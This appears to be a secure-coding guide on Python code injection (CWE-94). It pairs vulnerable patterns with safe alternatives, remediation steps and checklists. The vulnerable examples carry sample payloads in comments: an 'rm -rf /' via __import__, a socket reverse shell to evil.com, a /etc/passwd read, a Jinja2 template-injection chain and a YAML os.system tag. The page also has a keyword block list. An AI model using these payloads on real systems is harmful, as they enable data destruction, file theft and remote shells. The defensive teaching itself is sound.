Skip to content

CWE-94: Improper Control of Generation of Code (Code Injection) - Python

Overview

Code injection in Python occurs when untrusted input is passed to code execution functions like eval(), exec(), compile(), or __import__(). This allows attackers to execute arbitrary Python code with full access to the application's runtime environment, including file system, network, environment variables, imported modules, and all application data. Python's dynamic nature and powerful introspection capabilities make code injection particularly dangerous.

Primary Defence: Never use eval() or exec() with user input. Use safe alternatives like json.loads() for JSON data, ast.literal_eval() only for small Python literals, or a purpose-built parser/interpreter with an allowlist of supported operations. If arbitrary user code is unavoidable, run it outside the application process with OS/container isolation, no ambient secrets, no filesystem or network access unless explicitly required, strict resource limits, and short timeouts. Do not rely on restricted __builtins__ as a security boundary.

Common Vulnerable Patterns

eval() with User Input

# VULNERABLE - Direct eval of user input
def calculate(expression):
    result = eval(expression)  # NEVER DO THIS
    return result

# User input: "__import__('os').system('rm -rf /')"
# Executes arbitrary code!

Why this is vulnerable: eval() executes any Python expression. Attacker can import modules, call functions, access globals.

exec() with User Code

# VULNERABLE - Execute user-provided code
def run_user_script(code):
    exec(code)  # EXTREMELY DANGEROUS
    return "Script executed"

# User input: "import socket; s=socket.socket(); s.connect(('evil.com',1234)); ..."
# Reverse shell established!

Why this is vulnerable: exec() can execute multiple statements, imports, class definitions - full Python capabilities.

compile() and exec() Chain

# VULNERABLE - Compile and execute user code
def execute_formula(formula):
    compiled = compile(formula, '<string>', 'eval')
    result = eval(compiled)
    return result

# User input: "open('/etc/passwd').read()"
# Reads sensitive file

Why this is vulnerable: compile() + eval() provides same attack surface as direct eval().

Dynamic Module Import

import importlib

# VULNERABLE - Import user-specified module
def load_plugin(plugin_name):
    module = __import__(plugin_name)  # DANGEROUS
    return module

# Alternate dangerous approach
def load_module(module_name):
    module = importlib.import_module(module_name)  # DANGEROUS
    return module

# User input: "subprocess" or "os"
# Attacker can import any module and access dangerous functions

Why this is vulnerable: Allows importing arbitrary modules. Attacker can import os, subprocess, socket, etc.

Template Injection (Jinja2 Unsafe)

from jinja2 import Template

# VULNERABLE - User input in template without sandboxing
def render_greeting(name):
    template_str = f"Hello {{{{ {name} }}}}"
    template = Template(template_str)
    return template.render()

# User input: "''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].system('whoami')"
# Executes system command via template injection!

Why this is vulnerable: Jinja2 templates can access Python objects. Attacker can traverse object hierarchy to reach dangerous functions.

Pickle Deserialization

import pickle

# VULNERABLE - Unpickle untrusted data
def load_user_data(data):
    obj = pickle.loads(data)  # CRITICAL VULNERABILITY
    return obj

# Attacker sends crafted pickle payload
# Arbitrary code executes during unpickling

Why this is vulnerable: Pickle can execute arbitrary code during deserialization via __reduce__ method.

YAML Unsafe Loading

import yaml

# VULNERABLE - Load YAML with arbitrary Python object execution
def load_config(yaml_str):
    config = yaml.load(yaml_str, Loader=yaml.Loader)  # DANGEROUS
    return config

# User YAML input:
# !!python/object/apply:os.system ['whoami']
# Executes system command!

Why this is vulnerable: yaml.load() without Loader=yaml.SafeLoader can instantiate arbitrary Python objects.

Format String with User Globals Access

# VULNERABLE - Format string with untrusted format spec
def format_message(template, **kwargs):
    return template.format(**kwargs)

# User input template: "{user.__init__.__globals__[os].system('whoami')}"
# Can access dangerous objects through format spec

Why this is vulnerable: Format strings can access object attributes. Combined with __globals__, can reach dangerous modules.

Secure Patterns

SECURE: ast.literal_eval() for Safe Evaluation

import ast

# SECURE - Only allows Python literals (strings, numbers, tuples, lists, dicts, booleans, None)
def safe_calculate(expression):
    try:
        # Only evaluates literals - no function calls, no imports
        result = ast.literal_eval(expression)
        return result
    except (ValueError, SyntaxError):
        raise ValueError("Invalid expression")

# Safe inputs: "42", "3.14", "{'key': 'value'}", "[1, 2, 3]"
# Blocked: "__import__('os').system('whoami')" - raises ValueError

Why this works: ast.literal_eval() only parses Python literal structures (strings, numbers, tuples, lists, dicts, sets, booleans, and None). It cannot evaluate function calls, variable lookups, imports, or executable statements. That makes it a safer replacement for eval() when the expected input is a small literal value. It is not a general-purpose parser for untrusted arbitrary-size input: deeply nested or very large literals can still exhaust memory or the Python stack. Apply length, size, and nesting limits, and prefer json.loads() when JSON is an acceptable format.

SECURE: Restricted Expression Parser

import ast
import operator

# SECURE - Allowlist allowed operators
ALLOWED_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.Mod: operator.mod,
    ast.Pow: operator.pow,
    ast.USub: operator.neg,
}

ALLOWED_NODES = (ast.Expression, ast.Constant, ast.BinOp, ast.UnaryOp)

def safe_eval(expr):
    """Safely evaluate mathematical expressions only"""
    tree = ast.parse(expr, mode='eval')

    # Verify only allowed node types
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            raise ValueError(f"Forbidden node type: {type(node).__name__}")
        if isinstance(node, ast.BinOp) and type(node.op) not in ALLOWED_OPS:
            raise ValueError(f"Forbidden operator: {type(node.op).__name__}")

    # Execute with restricted environment
    def eval_node(node):
        if isinstance(node, ast.Constant):
            return node.value
        elif isinstance(node, ast.BinOp):
            left = eval_node(node.left)
            right = eval_node(node.right)
            return ALLOWED_OPS[type(node.op)](left, right)
        elif isinstance(node, ast.UnaryOp):
            operand = eval_node(node.operand)
            return ALLOWED_OPS[type(node.op)](operand)
        else:
            raise ValueError(f"Unsupported node: {type(node).__name__}")

    return eval_node(tree.body)

# Usage
result = safe_eval("(10 + 5) * 2")  # 30
# safe_eval("__import__('os').system('whoami')")  # Raises ValueError

Why this works: This AST-based expression evaluator parses user input into an Abstract Syntax Tree and validates it against an allowlist of safe node types and operators before execution. The ast.parse() call converts the expression into a structured tree without executing it. By walking the AST and checking each node is in ALLOWED_NODES (only literals, binary ops, unary ops) and each operator is in ALLOWED_OPS (only basic arithmetic), you prevent function calls, imports, attribute access, and other dangerous operations. The custom eval_node() interpreter then safely evaluates only the allowed operations. This approach is far more secure than eval() because attackers cannot call __import__(), access __builtins__, or escape the sandbox. Use this pattern for calculators, formula evaluators, or any feature where users provide mathematical expressions. The allowlist is explicit and auditable; add only operations you've reviewed.

SECURE: Configuration-Driven Logic (Not Code)

import json

# SECURE - Use JSON configuration instead of code
def apply_pricing_rule(price, rule_config):
    """Apply pricing rules from JSON config, not executable code"""
    rule = json.loads(rule_config)

    # Declarative configuration
    if rule['type'] == 'percentage_discount':
        discount = price * (rule['percent'] / 100)
        return price - discount
    elif rule['type'] == 'fixed_discount':
        return price - rule['amount']
    elif rule['type'] == 'bulk_discount':
        if price > rule['threshold']:
            return price * (1 - rule['discount'])
        return price
    else:
        raise ValueError("Unknown rule type")

# Safe configuration (JSON, not code)
config = '{"type": "percentage_discount", "percent": 10}'
discounted = apply_pricing_rule(100, config)  # 90.0

# No code injection possible - only data configuration

Why this works: Using JSON for configuration instead of executable code eliminates code injection entirely. JSON is a data-only format - it can only represent basic types (objects, arrays, strings, numbers, booleans, null); it cannot contain functions, class instantiations, imports, or executable statements. When you parse JSON with json.loads(), you get pure Python data structures (dicts, lists, strings, numbers), not code. The business logic (if/elif conditions, calculations) lives in your trusted Python code, while user input only supplies data values (discount percentages, thresholds, amounts). This is the safest pattern for extensibility: users configure behavior through data, not by injecting code. Even if an attacker fully controls rule_config, they can only set field values, not execute commands or access the system. Use JSON config for pricing rules, workflows, plugins, feature flags - anywhere users customize behavior. Combine with schema validation (jsonschema) to enforce data structure and prevent logic errors.

SECURE: Jinja2 with Sandboxing

from jinja2.sandbox import SandboxedEnvironment

# SECURE - Use Jinja2 sandbox and enable auto-escaping for HTML output
env = SandboxedEnvironment(autoescape=True)

def render_template(template_str, context):
    """Render templates in sandboxed environment"""
    template = env.from_string(template_str)
    return template.render(context)

# Usage
result = render_template("Hello {{ name }}!", {'name': 'Alice'})  # "Hello Alice!"

# Sandboxed - dangerous operations blocked
# template_str = "{{ ''.__class__.__mro__[1].__subclasses__() }}"
# Raises SecurityError

Why this works: Jinja2's SandboxedEnvironment restricts template access to dangerous Python features, reducing code injection risk from template strings. Unlike regular Jinja2 (which allows attribute access like {{''.__class__.__mro__}}), the sandbox blocks access to private attributes (those starting with _), sensitive methods (__subclasses__, __globals__), and dangerous builtins. Attackers often exploit template engines to escape into the Python runtime via attribute traversal; the sandbox prevents many of these escapes by intercepting attribute lookups and rejecting unsafe ones. Treat user-editable templates as executable template logic: use the sandbox, register only safe custom filters/functions, avoid helpers that reach files/network/process state, enable auto-escaping for HTML output, and apply size/time limits where possible. For stricter control, consider a logic-less engine (Mustache, Handlebars) or a small application-specific template language.

SECURE: Safe YAML Loading

import yaml

# SECURE - Use SafeLoader to prevent arbitrary object instantiation
def load_config(yaml_str):
    config = yaml.safe_load(yaml_str)  # ALWAYS use safe_load
    return config

# Alternative explicit safe loader
def load_config_explicit(yaml_str):
    config = yaml.load(yaml_str, Loader=yaml.SafeLoader)
    return config

# Safe - only loads basic YAML types (strings, numbers, lists, dicts)
# Blocks: !!python/object/apply:os.system ['whoami']

Why this works: yaml.safe_load() only constructs simple Python objects (dict, list, str, int, float, bool, None) and blocks arbitrary object instantiation, preventing code execution via YAML deserialization. Unsafe loaders such as yaml.Loader or UnsafeLoader can instantiate Python classes using YAML tags like !!python/object/apply:, allowing attackers to run os.system(), open files, or execute arbitrary code. safe_load() uses SafeLoader, which only recognizes basic YAML types and ignores dangerous tags. Always use safe_load() or explicitly pass Loader=yaml.SafeLoader when parsing untrusted YAML. This vulnerability (YAML deserialization) has caused major breaches; unsafe YAML loading is as dangerous as eval(). For configuration files you control, safe_load() is sufficient. If you need custom object loading, define explicit constructors with add_constructor() and validate fields, never use yaml.load() with unsafe loaders.

SECURE: JSON for Serialization (Not Pickle)

import json

# SECURE - Use JSON instead of pickle
def save_user_data(data):
    serialized = json.dumps(data)
    return serialized

def load_user_data(serialized):
    data = json.loads(serialized)
    return data

# JSON only supports basic types - no code execution
# If complex objects needed, use explicit serialization methods

Why this works: JSON is a data-only format that cannot execute code during deserialization, while pickle can instantiate arbitrary Python objects and execute code via __reduce__ methods, making it dangerous for untrusted data. When you json.loads() a payload, you get only basic types (dicts, lists, strings, numbers); an attacker cannot trigger class constructors, import modules, or run commands. Pickle, by contrast, is designed to serialize entire Python object graphs, including class instances, and can call arbitrary code during unpickling. Attackers craft malicious pickle payloads that execute os.system(), open reverse shells, or exfiltrate data. Never unpickle untrusted data - use JSON for serialization. If you need complex objects, serialize them to JSON with explicit to_dict() methods and reconstruct them with constructors that validate fields. For internal, trusted use (caching, IPC between your own processes), pickle is acceptable with integrity checks (HMAC).

SECURE: Plugin System with Allowlist

import importlib

# SECURE - Allowlist allowed plugins
ALLOWED_PLUGINS = {
    'plugin_auth': 'myapp.plugins.auth',
    'plugin_reports': 'myapp.plugins.reports',
    'plugin_export': 'myapp.plugins.export'
}

def load_plugin(plugin_name):
    """Load plugin from allowlist only"""
    if plugin_name not in ALLOWED_PLUGINS:
        raise ValueError(f"Plugin '{plugin_name}' not allowed")

    module_path = ALLOWED_PLUGINS[plugin_name]
    module = importlib.import_module(module_path)
    return module

# Safe - only pre-approved plugins can be loaded
# load_plugin('os')  # Raises ValueError

Why this works: Allowlisting modules for dynamic imports prevents code injection by ensuring only pre-approved, safe modules can be loaded. When users control which modules to import (plugin systems, configurable imports), an attacker could import dangerous modules (os, subprocess, importlib) or malicious third-party packages to execute arbitrary code, read files, or compromise the system. By checking plugin_name against ALLOWED_PLUGINS before calling importlib.import_module(), you ensure only trusted, reviewed plugins are accessible. The allowlist maps user-facing plugin names to specific module paths you control, preventing path traversal or namespace pollution. This pattern is critical for plugin architectures. Store the allowlist server-side (never trust client input for module names), keep it minimal and audited, and review each plugin's code. For stronger isolation, load plugins in separate processes (multiprocessing) or containers. Combine with code signing or hash verification to detect tampering.

Avoid SymPy parse_expr() / sympify() for Untrusted Strings

from sympy.parsing.sympy_parser import parse_expr, standard_transformations, implicit_multiplication_application

# DANGEROUS for untrusted input:
expr = parse_expr(user_input, transformations=standard_transformations)

Why this matters: SymPy's string parsers are powerful symbolic-math tools, but parse_expr() and sympify() use Python evaluation internally and SymPy documents that they should not be used on unsanitized input. For user-entered formulas, prefer the restricted AST evaluator above, a parser you can configure to a small grammar, or an isolated worker process with resource limits if symbolic math is truly required.

Key Security Functions

AST-based Expression Validator

import ast

def validate_safe_expression(expr_str):
    """Validate expression only contains safe operations"""
    try:
        tree = ast.parse(expr_str, mode='eval')
    except SyntaxError:
        raise ValueError("Invalid Python syntax")

    # Define allowed node types
    SAFE_NODES = (
        ast.Expression, ast.Constant, ast.Num, ast.Str,  # ast.Num, ast.Str for Python < 3.8
        ast.BinOp, ast.UnaryOp, ast.Compare,
        ast.List, ast.Tuple, ast.Dict,
        ast.Add, ast.Sub, ast.Mult, ast.Div, ast.Mod, ast.Pow,
        ast.Eq, ast.NotEq, ast.Lt, ast.LtE, ast.Gt, ast.GtE,
        ast.USub, ast.UAdd
    )

    for node in ast.walk(tree):
        if not isinstance(node, SAFE_NODES):
            raise ValueError(f"Forbidden operation: {type(node).__name__}")

    return True

# Usage
validate_safe_expression("(10 + 5) * 2")  # OK
# validate_safe_expression("__import__('os')")  # Raises ValueError

Avoid Restricted eval() as a Security Boundary

# DANGEROUS - restricted builtins are not a sandbox
safe_globals = {'__builtins__': {'abs': abs, 'max': max}}
result = eval(user_expression, safe_globals, {})

Why this matters: Removing selected builtins does not make Python evaluation safe. Python objects expose introspection paths, and restricted globals have a long history of bypasses. Replace eval() with an allowlisted parser. If you must run user code, run it out of process in a locked-down container or service account with resource limits and no application secrets.

Plugin Signature Verification

import hashlib
import hmac

PLUGIN_SECRET = b'your-secret-key-here'  # From environment variable

def verify_plugin_signature(plugin_code, signature):
    """Verify plugin hasn't been tampered with"""
    expected_sig = hmac.new(PLUGIN_SECRET, plugin_code.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected_sig, signature)

def load_verified_plugin(plugin_code, signature):
    """Only load plugins with valid signature"""
    if not verify_plugin_signature(plugin_code, signature):
        raise ValueError("Invalid plugin signature")

    # Even with verification, execute in restricted environment
    safe_globals = {'__builtins__': {}}
    exec(plugin_code, safe_globals)
    return safe_globals

Analysis Steps

  1. Locate the eval/exec Call:
# Line 42 in app/calculator.py
result = eval(user_expression)  # VULNERABLE
  1. Trace Input Source:
  • Web form? request.form['expression']
  • API endpoint? request.json['code']
  • File upload? Reading file contents
  • Database? User-stored formulas
  1. Assess Execution Context:
  • What can injected code access? (All Python modules, file system, network)
  • What privileges does application run with? (Web server user, database access)
  • What data is accessible? (User data, secrets in environment variables)
  1. Determine Safe Alternative:
  • Mathematical expressions → Use a restricted AST evaluator or a purpose-built expression parser; do not use SymPy string parsers on unsanitized input
  • Configuration → Use JSON/YAML with safe_load()
  • Business rules → Use rule engine or declarative config
  • Plugin system → Use allowlist + signature verification

Remediation for Scanner Finding

Step 1: Identify the purpose

# BEFORE (Line 42 - vulnerable)
def calculate(user_expression):
    result = eval(user_expression)  # User wants to calculate "2 + 2"
    return result

Step 2: Replace with safe alternative

def calculate(user_expression):
    # For arithmetic, use the restricted AST evaluator shown above,
    # or a reviewed expression parser configured to an allowlisted grammar.
    return safe_eval(user_expression)

Step 3: Add input validation

import re

def validate_math_expression(expr):
    """Additional validation layer"""
    # Max length
    if len(expr) > 200:
        raise ValueError("Expression too long")

    # Only allow safe characters
    if not re.match(r'^[0-9+\-*/().\s]+$', expr):
        raise ValueError("Invalid characters in expression")

    # Deny dangerous keywords
    forbidden = ['import', 'exec', 'eval', 'compile', 'open', '__']
    for word in forbidden:
        if word in expr.lower():
            raise ValueError("Forbidden keyword in expression")

    return True

def safe_calculate(user_expression):
    validate_math_expression(user_expression)
    return safe_eval(user_expression)

Common Scanner False Positives

False Positive: eval() with Hardcoded String

# May be flagged but is safe if input is truly hardcoded
config = eval("{'setting': True}")  # Hardcoded, not from user

# Better: Use ast.literal_eval anyway for defense-in-depth
config = ast.literal_eval("{'setting': True}")

Verification

After remediation:

  • No eval(), exec(), compile() with user input
  • No __import__() or importlib.import_module() with user strings
  • Templates use SandboxedEnvironment (Jinja2)
  • YAML uses yaml.safe_load() (not yaml.load())
  • Deserialization uses JSON (not pickle)
  • Scanner re-scan shows finding resolved
  • Tested with code injection payloads (blocked)

Security Checklist

  • Never use eval(), exec(), or compile() with user input
  • Never use __import__() or importlib.import_module() with user strings
  • Use ast.literal_eval() for literal evaluation only
  • Use JSON/YAML with safe_load() for configuration
  • Use SandboxedEnvironment for Jinja2 templates
  • Never deserialize untrusted data with pickle
  • Implement plugin allowlisting for dynamic imports
  • Validate input length and character set
  • Use AST parsing to verify safe expressions
  • Avoid SymPy parse_expr()/sympify() on unsanitized input; use an allowlisted parser or isolate symbolic math execution
  • Log and monitor code execution attempts
  • Run automated security scans (Bandit, Semgrep)

Additional Resources